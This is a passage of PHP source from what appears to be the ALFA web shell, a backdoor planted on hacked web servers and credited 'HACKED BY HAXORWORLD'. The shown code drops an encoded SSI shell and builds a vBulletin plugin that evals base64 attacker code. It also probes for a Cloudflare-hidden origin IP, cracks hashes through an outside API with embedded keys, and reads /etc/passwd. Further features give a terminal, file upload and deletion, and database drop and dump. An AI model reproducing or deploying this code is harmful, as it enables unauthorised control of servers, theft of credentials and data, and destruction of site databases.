  2104. __alfa_set_cookie("updateheader_data", __ZW5jb2Rlcg($data));
  2105. echo $data;
  2106. }
  2107. }else{
  2108. echo __ZGVjb2Rlcg($_COOKIE["updateheader_data"]);
  2109. }
  2110. }
  2111. function alfassiShell(){
  2112. alfahead();
  2113. echo '<div class=header>';
  2114. alfaCreateParentFolder();
  2115. @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
  2116. @mkdir('alfa_shtml',0755);
  2117. @chdir('alfa_shtml');
  2118. alfacgihtaccess('shtml');
  2119. $code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
  2120. @__write_file('alfa_ssi.shtml',__get_resource($code));
  2121. @chmod("alfa_ssi.shtml",0755);
  2122. echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
  2123. echo '</div>';
  2124. alfafooter();
  2125. }
  2126. function alfacloudflare(){
  2127. alfahead();
  2128. AlfaNum(8,9,10,7,6,5,4,3);
  2129. echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
  2130. <p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
  2131. if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
  2132. $url = $_POST['alfa1'];
  2133. if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
  2134. $url = preg_replace('/^(https?):\/\//', '', $url);
  2135. $url = "http://www.".$url;
  2136. }
  2137. $headers = @get_headers($url, 1);
  2138. $server = $headers['Server'];
  2139. $subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
  2140. if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
  2141. if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
  2142. $url = explode($matches[0], $url);
  2143. $url = $url[1];}}
  2144. if(is_array($server))$server = $server[0];
  2145. echo __pre();
  2146. if(preg_match('/cloudflare/i', $server))
  2147. echo "\n[+] CloudFlare detected: {$server}\n<br>";
  2148. else
  2149. echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
  2150. echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
  2151. echo "[+] Searching for more IP addresses.\n\n<br><br>";
  2152. for($x=0;$x<count($subs);$x++){
  2153. $site = $subs[$x] . $url;
  2154. $ip = is_ipv4(gethostbyname($site));
  2155. if($ip == '(Null)')
  2156. continue;
  2157. echo "Trying {$site}: {$ip}\n<br>";
  2158. }
  2159. echo "\n[+] Finished.\n<br>";
  2160. }
  2161. echo '</div>';
  2162. alfafooter();
  2163. }
  2164. function is_ipv4($ip){
  2165. return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
  2166. }
  2167. function __alert($s){
  2168. echo '<center>'.__pre().$s.'</center>';
  2169. }
  2170. function create_table($data){
  2171. echo '<table border="1">';
  2172. foreach ($data as $key => $val){
  2173. $array = array();
  2174. foreach($val as $k => $v){
  2175. $array[$k] = $v;
  2176. }
  2177. echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
  2178. }
  2179. echo '</table>';
  2180. }
  2181. function alfaphp2xml(){
  2182. alfahead();
  2183. AlfaNum(8,9,10,7,6,5,4,3);
  2184. echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
  2185. <p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
  2186. <input type='submit' name='go' value=' ' /></p></form></center>";
  2187. if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
  2188. echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
  2189. echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
  2190. echo '</textarea></center></p>';
  2191. }
  2192. echo '</center></div>';
  2193. alfafooter();
  2194. }
  2195. function alfacpcrack(){
  2196. alfahead();
  2197. echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
  2198. if($_POST['alfa1']=='dec'){
  2199. $algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
  2200. echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
  2201. <form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
  2202. foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
  2203. echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
  2204. if($_POST['alfa3'] == '>>'){
  2205. $hash = $_POST['alfa2'];
  2206. if(!empty($hash)){
  2207. $hash_type = $_POST['alfa4'];
  2208. $email = "solevisible@gmail.com";
  2209. $code = "7b9fa79f92c3cd96";
  2210. $target = "https://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
  2211. $resp = @file_get_contents($target);
  2212. if($resp==''){
  2213. $get = new AlfaCURL();
  2214. $resp = $get->Send($target);
  2215. }
  2216. echo __pre().'<center>';
  2217. switch($resp){
  2218. case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
  2219. case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
  2220. case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
  2221. case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
  2222. }
  2223. if(substr($resp,0,4)!='CODE'&&$resp!=''){
  2224. echo "<b>Result: <font color='green'>".$resp."</font></b>";
  2225. }elseif(substr($resp,0,4)!='CODE'){
  2226. echo "<font color='red'>NoT Found</font><br />";
  2227. }
  2228. echo('</center>');
  2229. }
  2230. }
  2231. }
  2232. if($_POST['alfa1']=='analyzer'){
  2233. echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
  2234. <form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
  2235. <div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
  2236. if($_POST['alfa3'] == '>>'){
  2237. $hash = $_POST['alfa2'];
  2238. if(!empty($hash)){
  2239. $curl = new AlfaCURL();
  2240. $resp = $curl->Send("https://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
  2241. echo(__pre().'<center>');
  2242. if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
  2243. echo('<font color="green">'.$s[1].'</font>');
  2244. }else{
  2245. echo('<font color="red">Not Found...!</font>');
  2246. }
  2247. echo('</center><br>');
  2248. }
  2249. }
  2250. }
  2251. echo '</div>';
  2252. alfafooter();
  2253. }
  2254. function alfafooter(){
  2255. if(!isset($_POST['ajax'])){
  2256. echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
  2257. <tr>
  2258. <td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
  2259. <td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
  2260. <td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
  2261. <td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
  2262. </tr>
  2263. <tr>
  2264. <td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
  2265. <td colspan='2'><form onsubmit=\"editor(this.file.value,'view','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
  2266. </tr>
  2267. <tr>
  2268. <td colspan='4'><form style='margin-top: 10px;' onsubmit=\"return false;\" autocomplete='off'><span><span class='footer_text'>Execute :</span><br><button onClick='alfaOpenPhpTerminal();return false;' class='foottable alfa_custom_cmd_btn'><img style='width:28px;vertical-align: middle;' src='http://solevisible.com/icons/menu/terminal.svg'> Terminal</button><br></form></td>
  2269. </tr>
  2270. <tr>
  2271. <td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
  2272. <input type='hidden' name='a' value='FilesMAn'>
  2273. <input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
  2274. <input type='hidden' name='ajax' value='true'>
  2275. <input type='hidden' name='alfa1' value='uploadFile'>
  2276. <input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
  2277. <span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);' multiple></p><input type='submit' name='submit' value=' '></form><div id='alfa-copyright'><span class='copyright'>[ SEO-PJP &copy; 2023-".date('Y')." ]</span><br><span><a href='javascript:void(0);' onclick='alert(\"HACKED BY HAXORWORLD\");' style='color: #E91E63;text-decoration: none;'>Contact Me at</a></span> <span style='letter-spacing: 2px;color: #dfff00;'>hokagepert4ma@gmail.com</span> <span><a style='color: #ff6060;text-decoration: none;' target='_blank' href='https://t.me/iamjejewii'>@seopjp</a></span></div></td>
  2278. </tr>
  2279. </table>
  2280. </div>
  2281. <div id='options_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"options_window\");'></div><div onClick='editorClose(\"options_window\");' class='close-button'></div></div></div><div style='height:100%;' class='content_options_holder'><div class='options_tab'></div><div class='options_content' style='margin-left:14px;margin-right:30px;background:#000;overflow:auto;'></div></div></div></div>
  2282. <div id='database_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'>Sql Manager</div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"database_window\");'></div><div onClick='editorClose(\"database_window\");' class='close-button'></div></div></div><div class='content_options_holder' style='margin-left:14px;margin-right:30px;background:#000;max-height:90%;'><div class='sql-tabs'></div><div class='sql-contents' style='max-height: 85vh;'></div></div></div></div>
  2283. <div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='position:relative;margin-left:14px;margin-right:30px;'><div class='terminal-tabs'></div><div style='height:90%;' class='terminal-contents'></div></div></div></div>
  2284. <div id='editor' style='display:none;'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div onclick='historyPanelController(this);' mode='visible' class='history-panel-controller'><<</div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'><div class='editor-tabs'></div><div class='editor-content-holder'></div></div></div></div></div></div>
  2285. <div id='update-content'></div>
  2286. <div id='database_window-minimized' onclick='showEditor(\"database_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div class='minimized-text' style='top: 15px;'>Database</div></div></div>
  2287. <div id='options_window-minimized' onclick='showEditor(\"options_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 4px;' class='minimized-text'>Options</div></div></div>
  2288. <div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 2px;' class='minimized-text'>Editor</div></div></div>
  2289. <div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 12px;' class='minimized-text'>Cgi Shell</div></div></div>
  2290. <div id='rightclick_menu'>
  2291. <a target='_blank' href='' name='newtab'><img src=\"http://solevisible.com/icons/menu/newtab.svg\"> Open in new tab</a>
  2292. <a target='_blank' href='' name='link'><img src=\"http://solevisible.com/icons/menu/link.svg\"> Open file directly</a>
  2293. <a href='javascript:void(0);' name='download'><img src=\"http://solevisible.com/icons/menu/download2.svg\"> Download</a>
  2294. <a href='' name='view'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View</a>
  2295. <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='view_archive'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View Archive</a>
  2296. <a href='' name='edit'><img src=\"http://solevisible.com/icons/menu/edit.svg\"> Edit</a>
  2297. <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"move\");' ftype='' path='' fname='' href='' href='' name='move'><img src=\"http://solevisible.com/icons/menu/move.svg\"> Move</a>
  2298. <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"copy\");' ftype='' path='' fname='' href='' name='copy'><img src=\"http://solevisible.com/icons/menu/copy.svg\"> Copy</a>
  2299. <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"rename\");' ftype='' path='' fname='' name='rename'><img src=\"http://solevisible.com/icons/menu/rename.svg\"> Rename</a>
  2300. <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"modify\");' ftype='' path='' fname='' name='modify'><img src=\"http://solevisible.com/icons/menu/time.svg\"> Modify</a>
  2301. <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"permission\");' name='permission'><img src=\"http://solevisible.com/icons/menu/key.svg\"> Change Permissions</a>
  2302. <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='compress'><img src=\"http://solevisible.com/icons/menu/resize.svg\"> Compress</a>
  2303. <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='extract'><img src=\"http://solevisible.com/icons/menu/increase.svg\"> Extract</a>
  2304. <a href='javascript:void(0);' name='delete'><img src=\"http://solevisible.com/icons/menu/delete.svg\"> Delete</a>
  2305. </div>
  2306. <div id=\"filesman-tab-full-path\"></div>
  2307. <div id='alert-area' class='alert-area'></div>
  2308. <div class='cl-popup-fixed' style='display:none;'>
  2309. <div id='shortcutMenu-holder'>
  2310. <div class='popup-head'></div>
  2311. <form autocomplete='off' onSubmit='return false;'>
  2312. <label class='old-path-lbl'></label>
  2313. <div style='overflow: hidden;white-space: nowrap;text-overflow: ellipsis;' class='old-path-content'></div>
  2314. <label style='margin-top:10px;' class='new-filename-lbl'>New file name</label>
  2315. <input type='text' name='fname'>
  2316. <div class='perm-table-holder'>
  2317. <table>
  2318. <tbody>
  2319. <tr>
  2320. <td><b>Mode</b></td>
  2321. <td>User</td>
  2322. <td>Group</td>
  2323. <td>World</td>
  2324. </tr>
  2325. <tr>
  2326. <td>Read</td>
  2327. <td><input type='checkbox' name='ur' value='4' onclick='calcperm();'></td>
  2328. <td><input type='checkbox' name='gr' value='4' onclick='calcperm();'></td>
  2329. <td><input type='checkbox' name='wr' value='4' onclick='calcperm();'></td>
  2330. </tr>
  2331. <tr>
  2332. <td>Write</td>
  2333. <td><input type='checkbox' name='uw' value='2' onclick='calcperm();'></td>
  2334. <td><input type='checkbox' name='gw' value='2' onclick='calcperm();'></td>
  2335. <td><input type='checkbox' name='ww' value='2' onclick='calcperm();'></td>
  2336. </tr>
  2337. <tr>
  2338. <td>Execute</td>
  2339. <td><input type='checkbox' name='ux' value='1' onclick='calcperm();'></td>
  2340. <td><input type='checkbox' name='gx' value='1' onclick='calcperm();'></td>
  2341. <td><input type='checkbox' name='wx' value='1' onclick='calcperm();'></td>
  2342. </tr>
  2343. <tr>
  2344. <td>Permission</td>
  2345. <td><input style='width:60px;' type='text' name='u' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"u\", [\"u\"]);'></td>
  2346. <td><input style='width:60px;' type='text' name='g' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"g\", [\"g\"]);'></td>
  2347. <td><input style='width:60px;' type='text' name='w' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"w\", [\"w\"]);'></td>
  2348. </tr>
  2349. </tbody>
  2350. </table>
  2351. </div>
  2352. </form>
  2353. <div class='popup-foot'>
  2354. <button style='background: #2b5225;' name='accept' action='' onclick='alfaPopUpDoAction(this);'></button>
  2355. <button style='background: #9e2c2c;' onclick='d.querySelector(\".cl-popup-fixed\").style.display=\"none\";'>Cancell</button>
  2356. </div>
  2357. </div>
  2358. </div>";?>
  2359. <script>
  2360. function alfaMysqlApi(e,t){var a={host:mysql_cache[e.db_id].host,user:mysql_cache[e.db_id].user,pass:mysql_cache[e.db_id].pass,db:e.db_target,db_id:e.db_id};if(e.hasOwnProperty("db_info"))for(var i in e.db_info)a[i]=e.db_info[i];var l={a:alfab64("Sql_manager_api"),c_:alfab64(c_),alfa1:alfab64(JSON.stringify(a))};if(e.hasOwnProperty("post"))for(var i in e.post.hasOwnProperty("alfa2")&&"load_data"!=e.post.alfa2&&"page"!=e.post.alfa2&&"edit"!=e.post.alfa2&&"delete"!=e.post.alfa2&&(d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-pager").innerHTML="",d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-reporter").innerHTML=""),e.post)l[i]=alfab64(e.post[i]);var r="";for(var o in l)r+=o+"="+l[o]+"&";alfaloader(e.db_id,"block"),_Ajax(d.URL,r,function(a){alfaloader(e.db_id,"none"),t(a)},!0,e.db_id)}function alfaMysqlFilterTable(e,t){setTimeout(function(){var a="",i="",l=(a="","");if(null!=e)a=e.getAttribute("target"),i=e.getAttribute("db_id"),l=e.value;else a=t.target,i=t.db_id,l=t.value;l=new RegExp(l,"i"),d.querySelectorAll("#"+i+" "+a+" ul > li").forEach(function(e){var t=e.querySelector(".mysql_tables");if(null==t)return!1;-1==(t=t.innerText).search(l)?e.style.display="none":e.style.display="block"})},200)}function alfaMysqlFilterAllTable(e,t){var a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" .mysql-tables input[name=filter_all]").value,l=d.querySelector("#"+a+" input[name=sql_count]").checked,r=[],o=[];if(d.querySelectorAll("#"+a+" .mysql-tables .list_container").forEach(function(e){var t=e.getAttribute("mode"),a=e.getAttribute("db_name");"no"==t&&r.push(a),o.push(a)}),r.length>0){if(0==i.length&&void 0===t)return!1;alfaMysqlApi({db_id:a,db_target:r[0],ajax_id:"mysql_get_all_tables",db_info:{databases:r},post:{alfa2:"load_all_tables",alfa3:l}},function(r){if(0!=r.length){for(var o in r=JSON.parse(r)){var n=o,s=d.querySelector("#"+a+" .cls-"+n);alfaMysqlMakeTblList(r[o],s,a,n,l)}void 0===t?alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}):(e.setAttribute("mode","opened"),d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/b_minus.png")}})}else if(void 0===t)for(var n in alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}),o)alfaMysqlTableMode(a,o[n],"closed");else{var s="",c=e.getAttribute("mode");for(var n in"opened"==c?(e.setAttribute("mode","closed"),s="b_plus.png"):(e.setAttribute("mode","opened"),s="b_minus.png"),o)alfaMysqlTableMode(a,o[n],c);d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/"+s}}function alfaMysqlTableMode(e,t,a){var i=d.querySelector("#"+e+" .cls-"+t),l="";void 0===a?(l=-1!=i.classList.value.indexOf("hide-db-tables")?"b_minus.png":"b_plus.png",i.classList.toggle("hide-db-tables")):"opened"==a?(l="b_plus.png",i.classList.add("hide-db-tables")):(l="b_minus.png",i.classList.remove("hide-db-tables")),d.querySelector("#"+e+" .cls-"+t+"-expander img").src="http://solevisible.com/icons/menu/"+l}function alfaMysqlExpander(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=e.getAttribute("sql_count"),l=d.querySelector("#"+a+" .cls-"+t);"loaded"==l.getAttribute("mode")?alfaMysqlTableMode(a,t):alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_get_tables",post:{alfa2:"load_tables",alfa3:i}},function(e){0!=e.length&&alfaMysqlMakeTblList(e=JSON.parse(e),l,a,t,i)})}function alfaMysqlTablesEvil(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i=e.getAttribute("mode");"checked"==i?(i=!1,e.setAttribute("mode","not")):(i=!0,e.setAttribute("mode","checked")),d.querySelectorAll("#"+a+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked=i})}function alfaMysqlTablesDumpDrop(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i="none";"dump"==e.value&&(i="block"),d.querySelector("#"+a+" "+t+" .dump-file-holder").style.display=i}function alfaMysqlTablesDumpDropBtn(e){var t=e.getAttribute("target"),a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=[],r=d.querySelector("#"+i+" input[name=sql_count]").checked,o=d.querySelector("#"+i+" "+t),n=o.querySelector("select[name=tables_evil]").value,s=o.querySelector(".dump-file-holder input").value;d.querySelectorAll("#"+i+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked&&l.push(e.value)}),l.length>0&&alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_query_evil",db_info:{tables:l,mode:n,dump_file:s},post:{alfa2:"dump_drop"}},function(e){0!=e.length&&(e=JSON.parse(e),"drop"==n?alfaMysqlMakeTblList(e,o,i,a,r):o.querySelector(".dump-file-holder").insertAdjacentHTML("beforeend","<div><a href='javascript:void(0);' onclick='g(\"FilesTools\",null,\""+s+'","download");\'><span>Download: '+s+"</span></a></div>"))})}function alfaMysqlMakeTblList(e,t,a,i,l){t.setAttribute("mode","loaded");var r='<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" db_id="'+a+'" placeholder="Filter Table" target=".cls-'+i+'" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';for(var o in e)null!=e[o]&&(r+="<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='"+e[o].name+"'>&nbsp;<a class='db-opt-id' db_target='"+i+"' db_id='"+a+"' href='javascript:void(0);' onclick=\"alfaLoadTableData(this, '"+e[o].name+"')\"><span class='mysql_tables' style='font-weight:unset;'>"+e[o].name+"</span></a>"+(l?" <small><span style='font-weight:unset;' class='mysql_table_count'>("+e[o].count+")</span></small>":"&nbsp;")+"</div></li>");r+='</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" db_id="'+a+'" class="db-opt-id" target=".cls-'+i+'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" db_id="'+a+'" target=".cls-'+i+'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" db_id="'+a+'" class="db-opt-id" db_target="'+i+'" target=".cls-'+i+'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>',t.innerHTML=r,d.querySelector("#"+a+" .cls-"+i+"-expander img").src="http://solevisible.com/icons/menu/b_minus.png"}function alfaMysqlQuery(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" textarea[name=query]").value;alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_load_query_data",db_info:{query:i},post:{alfa2:"query"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0))})}function alfaMysqlReportBuilder(e,t){var a="";t.status||(a="<div><span>Error: </span><div style='padding-left: 